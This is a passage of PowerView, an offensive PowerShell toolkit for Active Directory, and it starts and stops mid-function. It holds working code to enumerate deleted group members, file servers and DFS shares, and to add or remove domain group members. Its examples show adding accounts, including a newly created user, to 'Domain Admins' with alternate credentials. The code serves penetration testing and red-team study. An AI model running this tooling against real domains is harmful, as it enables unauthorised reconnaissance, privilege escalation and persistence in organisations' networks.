specified\ngroup identity. Accomplished by searching the linked attribute replication\nmetadata for the group using Get-DomainObjectLinkedAttributeHistory.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainObjectLinkedAttributeHistory\n\n.DESCRIPTION\n\nWraps Get-DomainObjectLinkedAttributeHistory to return the linked attribute\nreplication metadata for the specified group. These are cases where the\n'Version' attribute of group member in the replication metadata is even.\n\n.PARAMETER Identity\n\nA SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).\nWildcards accepted.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-DomainGroupMemberDeleted | Group-Object GroupDN\n\nCount Name                      Group\n----- ----                      -----\n    2 CN=Domain Admins,CN=Us... {@{GroupDN=CN=Domain Admins,CN=Users,DC=test...\n    3 CN=DomainLocalGroup,CN... {@{GroupDN=CN=DomainLocalGroup,CN=Users,DC=t...\n\n.EXAMPLE\n\nGet-DomainGroupMemberDeleted \"Domain Admins\" -Domain testlab.local\n\n\nGroupDN               : CN=Domain Admins,CN=Users,DC=testlab,DC=local\nMemberDN              : CN=testuser,CN=Users,DC=testlab,DC=local\nTimeFirstAdded        : 2017-06-13T23:07:43Z\nTimeDeleted           : 2017-06-13T23:26:17Z\nLastOriginatingChange : 2017-06-13T23:26:17Z\nTimesAdded            : 2\nLastOriginatingDsaDN  : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First\n                        -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca\n                        l\n\nGroupDN               : CN=Domain Admins,CN=Users,DC=testlab,DC=local\nMemberDN              : CN=dfm,CN=Users,DC=testlab,DC=local\nTimeFirstAdded        : 2017-06-13T22:20:02Z\nTimeDeleted           : 2017-06-13T23:26:17Z\nLastOriginatingChange : 2017-06-13T23:26:17Z\nTimesAdded            : 5\nLastOriginatingDsaDN  : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First\n                        -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca\n                        l\n\n.OUTPUTS\n\nPowerView.DomainGroupMemberDeleted\n\nCustom PSObject with translated replication metadata fields.\n\n.LINK\n\nhttps://blogs.technet.microsoft.com/pie/2014/08/25/metadata-2-the-ephemeral-admin-or-how-to-track-the-group-membership/\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]\n    [OutputType('PowerView.DomainGroupMemberDeleted')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]\n        [String[]]\n        $Identity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $Raw\n    )\n\n    BEGIN {\n        $SearcherArguments = @{\n            'Properties'    =   'msds-replvaluemetadata','distinguishedname'\n            'Raw'           =   $True\n            'LDAPFilter'    =   '(objectCategory=group)'\n        }\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n    }\n\n    PROCESS {\n        if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity }\n\n        Get-DomainObject @SearcherArguments | ForEach-Object {\n            $ObjectDN = $_.Properties['distinguishedname'][0]\n            ForEach($XMLNode in $_.Properties['msds-replvaluemetadata']) {\n                $TempObject = [xml]$XMLNode | Select-Object -ExpandProperty 'DS_REPL_VALUE_META_DATA' -ErrorAction SilentlyContinue\n                if ($TempObject) {\n                    if (($TempObject.pszAttributeName -Match 'member') -and (($TempObject.dwVersion % 2) -eq 0 )) {\n                        $Output = New-Object PSObject\n                        $Output | Add-Member NoteProperty 'GroupDN' $ObjectDN\n                        $Output | Add-Member NoteProperty 'MemberDN' $TempObject.pszObjectDn\n                        $Output | Add-Member NoteProperty 'TimeFirstAdded' $TempObject.ftimeCreated\n                        $Output | Add-Member NoteProperty 'TimeDeleted' $TempObject.ftimeDeleted\n                        $Output | Add-Member NoteProperty 'LastOriginatingChange' $TempObject.ftimeLastOriginatingChange\n                        $Output | Add-Member NoteProperty 'TimesAdded' ($TempObject.dwVersion / 2)\n                        $Output | Add-Member NoteProperty 'LastOriginatingDsaDN' $TempObject.pszLastOriginatingDsaDN\n                        $Output.PSObject.TypeNames.Insert(0, 'PowerView.DomainGroupMemberDeleted')\n                        $Output\n                    }\n                }\n                else {\n                    Write-Verbose \"[Get-DomainGroupMemberDeleted] Error retrieving 'msds-replvaluemetadata' for '$ObjectDN'\"\n                }\n            }\n        }\n    }\n}\n\n\nfunction Add-DomainGroupMember {\n<#\n.SYNOPSIS\n\nAdds a domain user (or group) to an existing domain group, assuming\nappropriate permissions to do so.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-PrincipalContext  \n\n.DESCRIPTION\n\nFirst binds to the specified domain context using Get-PrincipalContext.\nThe bound domain context is then used to search for the specified -GroupIdentity,\nwhich returns a DirectoryServices.AccountManagement.GroupPrincipal object. For\neach entry in -Members, each member identity is similarly searched for and added\nto the group.\n\n.PARAMETER Identity\n\nA group SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)\nspecifying the group to add members to.\n\n.PARAMETER Members\n\nOne or more member identities, i.e. SamAccountName (e.g. Group1), DistinguishedName\n(e.g. CN=group1,CN=Users,DC=testlab,DC=local), SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114),\nor GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202).\n\n.PARAMETER Domain\n\nSpecifies the domain to use to search for user/group principals, defaults to the current domain.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nAdd-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'\n\nAdds harmj0y to 'Domain Admins' in the current domain.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nAdd-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred\n\nAdds harmj0y to 'Domain Admins' in the current domain using the alternate credentials.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\n$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\nNew-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred\n\nCreates the 'andy' user with the specified description and password, using the specified\nalternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember\nand the alternate credentials.\n\n.LINK\n\nhttp://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True)]\n        [Alias('GroupName', 'GroupIdentity')]\n        [String]\n        $Identity,\n\n        [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('MemberIdentity', 'Member', 'DistinguishedName')]\n        [String[]]\n        $Members,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $ContextArguments = @{\n            'Identity' = $Identity\n        }\n        if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential }\n\n        $GroupContext = Get-PrincipalContext @ContextArguments\n\n        if ($GroupContext) {\n            try {\n                $Group = [System.DirectoryServices.AccountManagement.GroupPrincipal]::FindByIdentity($GroupContext.Context, $GroupContext.Identity)\n            }\n            catch {\n                Write-Warning \"[Add-DomainGroupMember] Error finding the group identity '$Identity' : $_\"\n            }\n        }\n    }\n\n    PROCESS {\n        if ($Group) {\n            ForEach ($Member in $Members) {\n                if ($Member -match '.+\\\\.+') {\n                    $ContextArguments['Identity'] = ($Member -split '\\\\')[1]\n                    $ContextArguments['Domain'] = ($Member -split '\\\\')[0]\n                    $UserContext = Get-PrincipalContext @ContextArguments\n                    if ($UserContext) {\n                        $UserIdentity = $UserContext.Identity\n                    }\n                }\n                else {\n                    $UserContext = $GroupContext\n                    $UserIdentity = $Member\n                }\n                Write-Verbose \"[Add-DomainGroupMember] Adding member '$Member' to group '$Identity'\"\n                $Member = [System.DirectoryServices.AccountManagement.Principal]::FindByIdentity($UserContext.Context, $UserIdentity)\n                $Group.Members.Add($Member)\n                $Group.Save()\n            }\n        }\n    }\n}\n\n\nfunction Remove-DomainGroupMember {\n<#\n.SYNOPSIS\n\nRemoves a domain user (or group) from an existing domain group, assuming\nappropriate permissions to do so.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-PrincipalContext  \n\n.DESCRIPTION\n\nFirst binds to the specified domain context using Get-PrincipalContext.\nThe bound domain context is then used to search for the specified -GroupIdentity,\nwhich returns a DirectoryServices.AccountManagement.GroupPrincipal object. For\neach entry in -Members, each member identity is similarly searched for and removed\nfrom the group.\n\n.PARAMETER Identity\n\nA group SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)\nspecifying the group to remove members from.\n\n.PARAMETER Members\n\nOne or more member identities, i.e. SamAccountName (e.g. Group1), DistinguishedName\n(e.g. CN=group1,CN=Users,DC=testlab,DC=local), SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114),\nor GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202).\n\n.PARAMETER Domain\n\nSpecifies the domain to use to search for user/group principals, defaults to the current domain.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nRemove-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'\n\nRemoves harmj0y from 'Domain Admins' in the current domain.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nRemove-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred\n\nRemoves harmj0y from 'Domain Admins' in the current domain using the alternate credentials.\n\n.LINK\n\nhttp://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True)]\n        [Alias('GroupName', 'GroupIdentity')]\n        [String]\n        $Identity,\n\n        [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('MemberIdentity', 'Member', 'DistinguishedName')]\n        [String[]]\n        $Members,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $ContextArguments = @{\n            'Identity' = $Identity\n        }\n        if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential }\n\n        $GroupContext = Get-PrincipalContext @ContextArguments\n\n        if ($GroupContext) {\n            try {\n                $Group = [System.DirectoryServices.AccountManagement.GroupPrincipal]::FindByIdentity($GroupContext.Context, $GroupContext.Identity)\n            }\n            catch {\n                Write-Warning \"[Remove-DomainGroupMember] Error finding the group identity '$Identity' : $_\"\n            }\n        }\n    }\n\n    PROCESS {\n        if ($Group) {\n            ForEach ($Member in $Members) {\n                if ($Member -match '.+\\\\.+') {\n                    $ContextArguments['Identity'] = $Member\n                    $UserContext = Get-PrincipalContext @ContextArguments\n                    if ($UserContext) {\n                        $UserIdentity = $UserContext.Identity\n                    }\n                }\n                else {\n                    $UserContext = $GroupContext\n                    $UserIdentity = $Member\n                }\n                Write-Verbose \"[Remove-DomainGroupMember] Removing member '$Member' from group '$Identity'\"\n                $Member = [System.DirectoryServices.AccountManagement.Principal]::FindByIdentity($UserContext.Context, $UserIdentity)\n                $Group.Members.Remove($Member)\n                $Group.Save()\n            }\n        }\n    }\n}\n\n\nfunction Get-DomainFileServer {\n<#\n.SYNOPSIS\n\nReturns a list of servers likely functioning as file servers.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainSearcher  \n\n.DESCRIPTION\n\nReturns a list of likely fileservers by searching for all users in Active Directory\nwith non-null homedirectory, scriptpath, or profilepath fields, and extracting/uniquifying\nthe server names.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-DomainFileServer\n\nReturns active file servers for the current domain.\n\n.EXAMPLE\n\nGet-DomainFileServer -Domain testing.local\n\nReturns active file servers for the 'testing.local' domain.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainFileServer -Credential $Cred\n\n.OUTPUTS\n\nString\n\nOne or more strings representing file server names.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType([String])]\n    [CmdletBinding()]\n    Param(\n        [Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainName', 'Name')]\n        [String[]]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        function Split-Path {\n            # short internal helper to split UNC server paths\n            Param([String]$Path)\n\n            if ($Path -and ($Path.split('\\\\').Count -ge 3)) {\n                $Temp = $Path.split('\\\\')[2]\n                if ($Temp -and ($Temp -ne '')) {\n                    $Temp\n                }\n            }\n        }\n\n        $SearcherArguments = @{\n            'LDAPFilter' = '(&(samAccountType=805306368)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(homedirectory=*)(scriptpath=*)(profilepath=*)))'\n            'Properties' = 'homedirectory,scriptpath,profilepath'\n        }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n    }\n\n    PROCESS {\n        if ($PSBoundParameters['Domain']) {\n            ForEach ($TargetDomain in $Domain) {\n                $SearcherArguments['Domain'] = $TargetDomain\n                $UserSearcher = Get-DomainSearcher @SearcherArguments\n                # get all results w/o the pipeline and uniquify them (I know it's not pretty)\n                $(ForEach($UserResult in $UserSearcher.FindAll()) {if ($UserResult.Properties['homedirectory']) {Split-Path($UserResult.Properties['homedirectory'])}if ($UserResult.Properties['scriptpath']) {Split-Path($UserResult.Properties['scriptpath'])}if ($UserResult.Properties['profilepath']) {Split-Path($UserResult.Properties['profilepath'])}}) | Sort-Object -Unique\n            }\n        }\n        else {\n            $UserSearcher = Get-DomainSearcher @SearcherArguments\n            $(ForEach($UserResult in $UserSearcher.FindAll()) {if ($UserResult.Properties['homedirectory']) {Split-Path($UserResult.Properties['homedirectory'])}if ($UserResult.Properties['scriptpath']) {Split-Path($UserResult.Properties['scriptpath'])}if ($UserResult.Properties['profilepath']) {Split-Path($UserResult.Properties['profilepath'])}}) | Sort-Object -Unique\n        }\n    }\n}\n\n\nfunction Get-DomainDFSShare {\n<#\n.SYNOPSIS\n\nReturns a list of all fault-tolerant distributed file systems\nfor the current (or specified) domains.\n\nAuthor: Ben Campbell (@meatballs__)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainSearcher  \n\n.DESCRIPTION\n\nThis function searches for all distributed file systems (either version\n1, 2, or both depending on -Version X) by searching for domain objects\nmatching (objectClass=fTDfs) or (objectClass=msDFS-Linkv2), respectively\nThe server data is parsed appropriately and returned.\n\n.PARAMETER Domain\n\nSpecifies the domains to use for the query, defaults to the current domain.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-DomainDFSShare\n\nReturns all distributed file system shares for the current domain.\n\n.EXAMPLE\n\nGet-DomainDFSShare -Domain testlab.local\n\nReturns all distributed file system shares for the 'testlab.local' domain.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainDFSShare -Credential $Cred\n\n.OUTPUTS\n\nSystem.Management.Automation.PSCustomObject\n\nA custom PSObject describing the distributed file systems.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')]\n    [OutputType('System.Management.Automation.PSCustomObject')]\n    [CmdletBinding()]\n    Param(\n        [Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainName', 'Name')]\n        [String[]]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [ValidateSet('All', 'V1', '1', 'V2', '2')]\n        [String]\n        $Version = 'All'\n    )\n\n    BEGIN {\n        $SearcherArguments = @{}\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n\n        function Parse-Pkt {\n            [CmdletBinding()]\n            Param(\n                [Byte[]]\n                $Pkt\n            )\n\n            $bin = $Pkt\n            $blob_version = [bitconverter]::ToUInt32($bin[0..3],0)\n            $blob_element_count = [bitconverter]::ToUInt32($bin[4..7],0)\n            $offset = 8\n            #https://msdn.microsoft.com/en-us/library/cc227147.aspx\n            $object_list = @()\n            for($i=1; $i -le $blob_element_count; $i++){\n                $blob_name_size_start = $offset\n                $blob_name_size_end = $offset + 1\n                $blob_name_size = [bitconverter]::ToUInt16($bin[$blob_name_size_start..$blob_name_size_end],0)\n\n                $blob_name_start = $blob_name_size_end + 1\n                $blob_name_end = $blob_name_start + $blob_name_size - 1\n                $blob_name = [System.Text.Encoding]::Unicode.GetString($bin[$blob_name_start..$blob_name_end])\n\n                $blob_data_size_start = $blob_name_end + 1\n                $blob_data_size_end = $blob_data_size_start + 3\n                $blob_data_size = [bitconverter]::ToUInt32($bin[$blob_data_size_start..$blob_data_size_end],0)\n\n                $blob_data_start = $blob_data_size_end + 1\n                $blob_data_end = $blob_data_start + $blob_data_size - 1\n                $blob_data = $bin[$blob_data_start..$blob_data_end]\n                switch -wildcard ($blob_name) {\n                    \"\\siteroot\" {  }\n                    \"\\domainroot*\" {\n                        # Parse DFSNamespaceRootOrLinkBlob object. Starts with variable length DFSRootOrLinkIDBlob which we parse first...\n                        # DFSRootOrLinkIDBlob\n                        $root_or_link_guid_start = 0\n                        $root_or_link_guid_end = 15\n                        $root_or_link_guid = [byte[]]$blob_data[$root_or_link_guid_start..$root_or_link_guid_end]\n                        $guid = New-Object Guid(,$root_or_link_guid) # should match $guid_str\n                        $prefix_size_start = $root_or_link_guid_end + 1\n                        $prefix_size_end = $prefix_size_start + 1\n                        $prefix_size = [bitconverter]::ToUInt16($blob_data[$prefix_size_start..$prefix_size_end],0)\n                        $prefix_start = $prefix_size_end + 1\n                        $prefix_end = $prefix_start + $prefix_size - 1\n                        $prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$prefix_start..$prefix_end])\n\n                        $short_prefix_size_start = $prefix_end + 1\n                        $short_prefix_size_end = $short_prefix_size_start + 1\n                        $short_prefix_size = [bitconverter]::ToUInt16($blob_data[$short_prefix_size_start..$short_prefix_size_end],0)\n                        $short_prefix_start = $short_prefix_size_end + 1\n                        $short_prefix_end = $short_prefix_start + $short_prefix_size - 1\n                        $short_prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$short_prefix_start..$short_prefix_end])\n\n                        $type_start = $short_prefix_end + 1\n                        $type_end = $type_start + 3\n                        $type = [bitconverter]::ToUInt32($blob_data[$type_start..$type_end],0)\n\n                        $state_start = $type_end + 1\n                        $state_end = $state_start + 3\n                        $state = [bitconverter]::ToUInt32($blob_data[$state_start..$state_end],0)\n\n                        $comment_size_start = $state_end + 1\n                        $comment_size_end = $comment_size_start + 1\n                        $comment_size = [bitconverter]::ToUInt16($blob_data[$comment_size_start..$comment_size_end],0)\n                        $comment_start = $comment_size_end + 1\n                        $comment_end = $comment_start + $comment_size - 1\n                        if ($comment_size -gt 0)  {\n                            $comment = [System.Text.Encoding]::Unicode.GetString($blob_data[$comment_start..$comment_end])\n                        }\n                        $prefix_timestamp_start = $comment_end + 1\n                        $prefix_timestamp_end = $prefix_timestamp_start + 7\n                        # https://msdn.microsoft.com/en-us/library/cc230324.aspx FILETIME\n                        $prefix_timestamp = $blob_data[$prefix_timestamp_start..$prefix_timestamp_end] #dword lowDateTime #dword highdatetime\n                        $state_timestamp_start = $prefix_timestamp_end + 1\n                        $state_timestamp_end = $state_timestamp_start + 7\n                        $state_timestamp = $blob_data[$state_timestamp_start..$state_timestamp_end]\n                        $comment_timestamp_start = $state_timestamp_end + 1\n                        $comment_timestamp_end = $comment_timestamp_start + 7\n                        $comment_timestamp = $blob_data[$comment_timestamp_start..$comment_timestamp_end]\n                        $version_start = $comment_timestamp_end  + 1\n                        $version_end = $version_start + 3\n                        $version = [bitconverter]::ToUInt32($blob_data[$version_start..$version_end],0)\n\n                        # Parse rest of DFSNamespaceRootOrLinkBlob here\n                        $dfs_targetlist_blob_size_start = $version_end + 1\n                        $dfs_targetlist_blob_size_end = $dfs_targetlist_blob_size_start + 3\n                        $dfs_targetlist_blob_size = [bitconverter]::ToUInt32($blob_data[$dfs_targetlist_blob_size_start..$dfs_targetlist_blob_size_end],0)\n\n                        $dfs_targetlist_blob_start = $dfs_targetlist_blob_size_end + 1\n                        $dfs_targetlist_blob_end = $dfs_targetlist_blob_start + $dfs_targetlist_blob_size - 1\n                        $dfs_targetlist_blob = $blob_data[$dfs_targetlist_blob_start..$dfs_targetlist_blob_end]\n                        $reserved_blob_size_start = $dfs_targetlist_blob_end + 1\n                        $reserved_blob_size_end = $reserved_blob_size_start + 3\n                        $reserved_blob_size = [bitconverter]::ToUInt32($blob_data[$reserved_blob_size_start..$reserved_blob_size_end],0)\n\n                        $reserved_blob_start = 